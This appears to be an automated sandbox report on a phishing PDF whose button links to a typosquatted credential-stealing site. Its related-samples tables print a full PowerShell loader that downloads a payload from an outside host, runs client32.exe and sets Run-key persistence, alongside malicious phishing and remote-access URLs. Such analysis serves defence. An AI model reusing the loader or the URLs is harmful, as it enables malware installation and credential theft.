Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:58061 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:58069 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:58151 version: TLS 1.2
Source: classification engineClassification label: mal56.winPDF@38/53@11/6
Source: completedfiles.....pdfInitial sample: https://dsllnnovations.com/aith/
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-29 19-21-52-272.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\completedfiles.....pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1680,i,5364743034394867823,15920541604491222706,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://dsllnnovations.com/aith/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1896,i,9296518696687026067,6868305486680022474,262144 /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1680,i,5364743034394867823,15920541604491222706,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1896,i,9296518696687026067,6868305486680022474,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: completedfiles.....pdfInitial sample: PDF keyword /JS count = 0
Source: completedfiles.....pdfInitial sample: PDF keyword /JavaScript count = 0
Source: completedfiles.....pdfInitial sample: PDF keyword /EmbeddedFile count = 0

Persistence and Installation Behavior

barindex
Source: PDF documentLLM: PDF document contains prominent button: 'click here to view documents'
Source: EmailJoeBoxAI: AI detected Brand spoofing attempt in URL: URL: https://dsllnnovations.com
Source: EmailJoeBoxAI: AI detected Typosquatting in URL: URL: https://dsllnnovations.com
Source: EmailJoeBoxAI: AI detected Brand spoofing attempt in URL: URL: https://dsllnnovations.com/aith/
Source: EmailJoeBoxAI: AI detected Typosquatting in URL: URL: https://dsllnnovations.com/aith/
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Spearphishing Link
Windows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://dsllnnovations.com/aith/100%SlashNextCredential Stealing type: Phishing & Social Engineering
http://x1.i.lencr.org/0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    unknown
    dsllnnovations.com
    172.67.148.212
    truetrue
      unknown
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        unknown
        www.google.com
        142.250.185.228
        truefalse
          unknown
          x1.i.lencr.org
          unknown
          unknownfalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://dsllnnovations.com/aith/true
            • SlashNext: Credential Stealing type: Phishing & Social Engineering
            unknown
            https://dsllnnovations.com/cdn-cgi/challenge-platform/h/g/jsd/r/8da6e8395f456b4cfalse
              unknown
              https://a.nel.cloudflare.com/report/v4?s=3bUim3iY4PcsjaZlndc%2FTZFaPtf%2BSfyhc7Li1a9wsJs3YMtr6M2x3bE9%2FpY8dtlEv5%2Bf23p%2FRNT0jpu8EXMBojJMp6vEDLKcBbbvV2o6g5shh5T2L3KRkZYyk6L17HzUPq0DS%2FE%3Dfalse
                unknown
                https://a.nel.cloudflare.com/report/v4?s=wQUFBqa7R1IgSs0Mc69YtV5I0RJXcmoovnxclmdzQxu7Zm%2F90QwC8t4dPeZMt5uGI81%2BZ06kUDU4XY%2F8c9nFuRZVUM8JMjKCoOmnbLFAm5a0ujG7OLOE4wOzQsviQuHYGwPF2lc%3Dfalse
                  unknown
                  https://dsllnnovations.com/favicon.icofalse
                    unknown
                    https://dsllnnovations.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/f2bbd6738e15/main.js?false
                      unknown
                      https://a.nel.cloudflare.com/report/v4?s=juk1jZp%2F50rc8sadSn%2BJEC3ihwPx978HFKpo4QDgdXrM2EFBmJgsXMcbs%2Bs52VXQpVkKwzsMTAnVKul0JdNxLj%2BGR2DhquxoLhGIGhVP%2Fh8hdyaHiu2qOqK3wBcu0vWS2yvT%2BCQ%3Dfalse
                        unknown
                        https://dsllnnovations.com/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.1.drfalse
                          • URL Reputation: safe
                          unknown
                          https://dsllnnovations.com/aith/)completedfiles.....pdftrue
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            142.250.185.228
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            172.67.148.212
                            dsllnnovations.comUnited States
                            13335CLOUDFLARENETUStrue
                            239.255.255.250
                            unknownReserved
                            unknownunknownfalse
                            104.21.63.172
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            35.190.80.1
                            a.nel.cloudflare.comUnited States
                            15169GOOGLEUSfalse
                            IP
                            192.168.2.4
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1545000
                            Start date and time:2024-10-30 00:20:57 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 27s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:defaultwindowspdfcookbook.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:14
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:completedfiles.....pdf
                            Detection:MAL
                            Classification:mal56.winPDF@38/53@11/6
                            Cookbook Comments:
                            • Found application associated with file extension: .pdf
                            • Found PDF document
                            • Close Viewer
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 184.28.88.176, 107.22.247.231, 34.193.227.236, 18.207.85.246, 54.144.73.197, 2.19.126.143, 2.19.126.142, 172.64.41.3, 162.159.61.3, 2.23.197.184, 95.101.148.135, 199.232.214.172, 192.229.221.95, 142.250.186.78, 173.194.76.84, 142.250.186.163, 34.104.35.123, 142.250.181.234, 216.58.206.74, 172.217.23.106, 142.250.185.138, 216.58.206.42, 142.250.74.202, 172.217.18.106, 142.250.185.106, 142.250.185.170, 142.250.186.138, 142.250.185.74, 142.250.185.202, 142.250.186.74, 172.217.16.138, 142.250.186.42, 142.250.185.234, 142.250.186.67, 142.250.184.206
                            • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, clientservices.googleapis.com, acroipm2.adobe.com, dns.msftncsi.com, clients2.google.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, optimizationguide-pa.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, edgedl.me.gvt1.com, clients.l.google.com, geo2.adobe.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa
                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                            • Not all processes where analyzed, report is missing behavior information
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: completedfiles.....pdf
                            TimeTypeDescription
                            19:22:03API Interceptor2x Sleep call for process: AcroCEF.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            239.255.255.250https://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cvGet hashmaliciousUnknownBrowse
                              https://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cvGet hashmaliciousUnknownBrowse
                                https://docs.google.com/uc?export=download&id=1rG5XITnDsiVQCEMAfg1Ex3pDcYxrlv0NGet hashmaliciousUnknownBrowse
                                  https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
                                    w143WSLuC4.exeGet hashmaliciousUnknownBrowse
                                      w143WSLuC4.exeGet hashmaliciousClipboard HijackerBrowse
                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                          https://mailhotcmhakamloops.wordpress.com/Get hashmaliciousUnknownBrowse
                                            http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$HRBRG='https://hdlclub2.cc/work/das.php?7387';$VHFTQMWZL=(New-Object%20System.Net.WebClient).DownloadString($HRBRG);$ZLFHWXDCL=%5BSystem.Convert%5D::FromBase64String($VHFTQMWZL);$asd%20=%20Get-Random%20-Minimum%20-5%20-Maximum%2012;%20$ATADDMBRA=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CYWYSGSQHQ'+$asd;if%20(!(Test-Path%20$ATADDMBRA%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$ATADDMBRA%20-ItemType%20Directory%20%7D;$p=Join-Path%20$ATADDMBRA%20'CXCC.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$ZLFHWXDCL);try%20%7B%20%20%20%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$ATADDMBRA)%7D%20catch%20%7B%20%20%20%20Write-Host%20'Failed:%20'%20+%20$_;%20%20%20%20exit%7D;$CV=Join-Path%20$ATADDMBRA%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7BWrite-Host%20'No%20exe.'%7D;$fd=Get-Item%20$ATADDMBRA%20-Force;%20$fd.attributes='Hidden';$s=$ATADDMBRA+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='NXXUI';$ASDASD='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$ASDASD;Get hashmaliciousUnknownBrowse
                                              NGy4YdKSwE.exeGet hashmaliciousStealc, VidarBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                bg.microsoft.map.fastly.nethttps://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cvGet hashmaliciousUnknownBrowse
                                                • 199.232.214.172
                                                https://docs.google.com/uc?export=download&id=1rG5XITnDsiVQCEMAfg1Ex3pDcYxrlv0NGet hashmaliciousUnknownBrowse
                                                • 199.232.210.172
                                                https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
                                                • 199.232.214.172
                                                http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$HRBRG='https://hdlclub2.cc/work/das.php?7387';$VHFTQMWZL=(New-Object%20System.Net.WebClient).DownloadString($HRBRG);$ZLFHWXDCL=%5BSystem.Convert%5D::FromBase64String($VHFTQMWZL);$asd%20=%20Get-Random%20-Minimum%20-5%20-Maximum%2012;%20$ATADDMBRA=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CYWYSGSQHQ'+$asd;if%20(!(Test-Path%20$ATADDMBRA%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$ATADDMBRA%20-ItemType%20Directory%20%7D;$p=Join-Path%20$ATADDMBRA%20'CXCC.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$ZLFHWXDCL);try%20%7B%20%20%20%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$ATADDMBRA)%7D%20catch%20%7B%20%20%20%20Write-Host%20'Failed:%20'%20+%20$_;%20%20%20%20exit%7D;$CV=Join-Path%20$ATADDMBRA%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7BWrite-Host%20'No%20exe.'%7D;$fd=Get-Item%20$ATADDMBRA%20-Force;%20$fd.attributes='Hidden';$s=$ATADDMBRA+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='NXXUI';$ASDASD='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$ASDASD;Get hashmaliciousUnknownBrowse
                                                • 199.232.210.172
                                                https://frs1sctxxr.shop/1stSourceGet hashmaliciousUnknownBrowse
                                                • 199.232.210.172
                                                http://mhmgc.com/Get hashmaliciousHTMLPhisherBrowse
                                                • 199.232.210.172
                                                Wcan4j2ldm.dllGet hashmaliciousUnknownBrowse
                                                • 199.232.214.172
                                                GaOxbeRXoO.dllGet hashmaliciousUnknownBrowse
                                                • 199.232.214.172
                                                https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=Get hashmaliciousScreenConnect ToolBrowse
                                                • 199.232.210.172
                                                J4zGPhVRV3.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                • 199.232.210.172
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUShttps://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
                                                • 104.18.86.42
                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                • 172.64.41.3
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 188.114.97.3
                                                https://mailhotcmhakamloops.wordpress.com/Get hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                https://bioaquatictesting-my.sharepoint.com/:f:/g/personal/securedocument_bio-aquatic_com/EqfT1pjHkSVIsZ_uZ-FoAy4BgWwRj-5I-q_oaUpvi5Mxeg?e=eaqeTTGet hashmaliciousUnknownBrowse
                                                • 188.114.96.3
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 188.114.96.3
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 172.67.180.76
                                                https://frs1sctxxr.shop/1stSourceGet hashmaliciousUnknownBrowse
                                                • 188.114.97.3
                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                • 188.114.96.3
                                                https://www.directo.com.bo/dokGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                CLOUDFLARENETUShttps://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
                                                • 104.18.86.42
                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                • 172.64.41.3
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 188.114.97.3
                                                https://mailhotcmhakamloops.wordpress.com/Get hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                https://bioaquatictesting-my.sharepoint.com/:f:/g/personal/securedocument_bio-aquatic_com/EqfT1pjHkSVIsZ_uZ-FoAy4BgWwRj-5I-q_oaUpvi5Mxeg?e=eaqeTTGet hashmaliciousUnknownBrowse
                                                • 188.114.96.3
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 188.114.96.3
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 172.67.180.76
                                                https://frs1sctxxr.shop/1stSourceGet hashmaliciousUnknownBrowse
                                                • 188.114.97.3
                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                • 188.114.96.3
                                                https://www.directo.com.bo/dokGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                28a2c9bd18a11de089ef85a160da29e4https://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cvGet hashmaliciousUnknownBrowse
